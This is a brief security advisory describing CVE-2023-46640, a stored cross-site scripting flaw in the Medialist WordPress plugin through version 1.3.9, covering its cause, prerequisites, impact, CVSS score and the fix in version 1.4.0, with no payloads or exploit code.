CVE-2023-46640

Root

Cause

The Medialist plugin for WordPress, versions 1.3.9 and earlier, suffers from a stored Cross-Site Scripting (XSS) vulnerability. The flaw allows authenticated users with contributor-level access or higher to inject arbitrary web scripts or HTML into the application's database. These injected payloads are subsequently served to visitors when the affected page is rendered, without proper sanitization or output encoding [1].

Exploitation

To exploit this vulnerability, an attacker must first obtain a WordPress account with at least contributor privileges. The attack does not require any special network position; it can be performed entirely through the WordPress admin interface. Successful exploitation also requires a privileged user (such as a site administrator) to perform an action, such as visiting a crafted page or clicking a malicious link, which triggers the stored payload. This means the attack chain relies on social engineering or tricking an admin into an interaction [1].

Impact

A successful attack allows the malicious actor to inject malicious scripts, including redirects, advertisements, or other HTML payloads, into the target website. These scripts execute in the browsers of unsuspecting visitors, potentially leading to credential theft, session hijacking, defacement, or further compromise of the site. The vulnerability is rated as Medium severity with a CVSS v3 base score of 6.5 [1].

Mitigation

The vulnerability is resolved in version 1.4.0 of the Medialist plugin. Users are strongly advised to update immediately. For those who cannot update, a mitigation rule is available through Patchstack to block attacks until the patch can be applied. Given that such XSS vulnerabilities are commonly used in mass-exploit campaigns, prompt remediation is critical [1].